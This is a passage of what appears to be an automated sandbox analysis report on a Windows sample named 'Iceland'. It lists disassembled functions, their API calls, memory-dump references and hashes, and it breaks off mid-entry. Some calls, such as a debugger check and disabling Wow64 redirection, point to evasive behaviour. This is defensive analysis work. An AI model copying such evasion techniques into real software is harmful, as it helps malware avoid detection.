                                                                                                                                                                                                                                                                  • Part of subcall function 00A232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A23312
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A23368,?), ref: 00A233BB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A23368,?), ref: 00A233CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AF2418,00AF2400,?,?,?,?,?,?,00A23368,?), ref: 00A2343A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A234BB
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00A23377
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                • Opcode ID: e7d39b0428ee2f6f555e9a5525e9d0e75c9aa0cd9a6529f0c55f5266c2a596d6
                                                                                                                                                                                                                                                                • Instruction ID: 92b6b986183cb6eefe0bbba7dc06e8d703b3285dd5e841a838065bda29236444
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7d39b0428ee2f6f555e9a5525e9d0e75c9aa0cd9a6529f0c55f5266c2a596d6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28F03AB6954345AFEB00EFF4FD0BB7437A4A701709F004A25B5098E0E3DBBA9652CB40
                                                                                                                                                                                                                                                                Function 00A2CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A2CEEE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                • Opcode ID: e180d7eb4f58b4765d67102afbf926c830615bb25c30b69499d62d4531e26581
                                                                                                                                                                                                                                                                • Instruction ID: de01d254d82dea472d88c9e837596d0ce066e46ebe1878230a4291de58f8f4f9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e180d7eb4f58b4765d67102afbf926c830615bb25c30b69499d62d4531e26581
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1832AE75A00229AFCF24CF5CD984ABEB7F5EF44324F158069E90AAB251D774AE41CB90
                                                                                                                                                                                                                                                                Function 00AA7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                • Opcode ID: f35692ef40d32e198b9c9f48f1464a3f0b31cbc03637074cf8190b60394dd55d
                                                                                                                                                                                                                                                                • Instruction ID: 5af9427bc785987facaff3994a45acacc0e31450eaaa8ce4d7468870812a668b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f35692ef40d32e198b9c9f48f1464a3f0b31cbc03637074cf8190b60394dd55d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40D16C75A0420AEFCF14EF98D9819EEBBB5FF49310F144169E915AB291DB30AE41CF90
                                                                                                                                                                                                                                                                Function 00A4F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5ef438f39e4151e32d51ce021b84924a7fa33237c67d49839c0d499fcaea379b
                                                                                                                                                                                                                                                                • Instruction ID: 6bf03a97ee046abadcc00e9f6599cdaf5743007199db0424eee21eb8ff763bd9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ef438f39e4151e32d51ce021b84924a7fa33237c67d49839c0d499fcaea379b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1251C679A00108AFDB10DFA8C945FE97BB1EFC5364F199168E8189B391D771ED42CB90
                                                                                                                                                                                                                                                                Function 00A8FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00A8FCCE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BuffCharLower
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                • Opcode ID: 5943f98823b645ff7df64454dc28ca5da4fe3b9b881e14e3272ab1056767a607
                                                                                                                                                                                                                                                                • Instruction ID: 3ef4fc21527613e3f77866c1dbce4e315631a5c6bcbc99a9e10bc48940ed527f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5943f98823b645ff7df64454dc28ca5da4fe3b9b881e14e3272ab1056767a607
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141B5B650020AAFCB11FFA8C9819AEB7B8EF44314B21453EEA16D7251EB70DE05CB50
                                                                                                                                                                                                                                                                Function 00A26679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2664A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A2665C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2663E: FreeLibrary.KERNEL32(00000000,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2666E
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A266AB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A26607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26610
                                                                                                                                                                                                                                                                  • Part of subcall function 00A26607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A26622
                                                                                                                                                                                                                                                                  • Part of subcall function 00A26607: FreeLibrary.KERNEL32(00000000,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26635
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                • Opcode ID: 17af632f1e5b3a0454577d3c7055f61ab7271547fc26edabb13c8ca7b6f90dcb
                                                                                                                                                                                                                                                                • Instruction ID: 66937eda906b60faf1862b0bf577c5f8e6fa1e5599f4f38344188f046f7a6594
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17af632f1e5b3a0454577d3c7055f61ab7271547fc26edabb13c8ca7b6f90dcb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8911E372601215AACF18AB78EA02FAD7BB5AF50710F10883DF542A61C2EE71DA05DB50
                                                                                                                                                                                                                                                                Function 00A58782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                • Opcode ID: c4703cff0ee22514fc8459cbdc5847a4baab8a5506385f018e39cbbe35828265
                                                                                                                                                                                                                                                                • Instruction ID: 6fbdf839c4f4e7d259fb5cedffcead1d318417a960d5ab3815ff6cf89935bb35
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4703cff0ee22514fc8459cbdc5847a4baab8a5506385f018e39cbbe35828265
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8611187590410AEFCB05DF98E94599A7BF4FF48310F114069FC09AB311DA31EA15CB65
                                                                                                                                                                                                                                                                Function 00A55373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A54FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A55031
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A553DF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 614378929-0
                                                                                                                                                                                                                                                                • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                • Instruction ID: 7bf72b762535080854ac7ec107d088a54436437115cdfe9b4d5f1028dd5d33bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65012B725003046BE3318F69D85195AFBE9FB853B1F25052DE98487280EA70A809C764
                                                                                                                                                                                                                                                                Function 00A4E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                • Instruction ID: d702e6fe55607045c54f9a40a646ad141b67a0457448024b03df49166f6e471e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98F0283A5016209AD6717B3BDD05B6A77A8BFC2331F100726FC21D32D2EB74E80686D2
                                                                                                                                                                                                                                                                Function 00A9F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A9F987
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                • Opcode ID: 96e69b28dbe56c8002123babb7deb685649b2b84bfd3edc58f11a57e10bd07a4
                                                                                                                                                                                                                                                                • Instruction ID: 11471e698c0cb2b736d90715476d25cd1c1ca7bc75f80d95e94a1a6a5f749b2d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96e69b28dbe56c8002123babb7deb685649b2b84bfd3edc58f11a57e10bd07a4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FF0AF76A00204BFCB00EBA9DD46D9FBBB8EF89720F000064F605DB261EA70EE41C760
                                                                                                                                                                                                                                                                Function 00A54FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A55031
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: c7f44ec25b67be6b6e8e4f07e1b7106d855f0ff898e684a296e594acac85eb68
                                                                                                                                                                                                                                                                • Instruction ID: 516605a61774d87d4843d330682cac1ea60582b380d4e8de95a16552e745e89a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f44ec25b67be6b6e8e4f07e1b7106d855f0ff898e684a296e594acac85eb68
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52F0E936D10E20AFDB315F76EC21B5A3758BF807E1F154121BC049B0E1EA70D80A86E0
                                                                                                                                                                                                                                                                Function 00A53B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 0743edd3693aae00a80774006a6ec3ed0a2639f5959eb9a8e0ea651d4f423a14
                                                                                                                                                                                                                                                                • Instruction ID: a0afb6de98c4f80d74b526d8cfe6aa44be5404d39f5d2bbd5399294ea8a4bb22
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0743edd3693aae00a80774006a6ec3ed0a2639f5959eb9a8e0ea651d4f423a14
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09E0E53360062067DE216BB69C01B5A365CBFC13E2F170621EC049A092DB70CD0481A0
                                                                                                                                                                                                                                                                Function 00A266E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 32967ad18134363addf43e3ff53980eb788c5848f770c6b9c0e0a1080c2f0000
                                                                                                                                                                                                                                                                • Instruction ID: 1efe70df634aa25c069515654455c458e258cfbcff350fb8b1aae58b91a5360c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32967ad18134363addf43e3ff53980eb788c5848f770c6b9c0e0a1080c2f0000
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57F03975506722CFCB389F68E8A0816BBF4BF143293248A3EE1D786A21C7759840DF50
                                                                                                                                                                                                                                                                Function 00A76AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
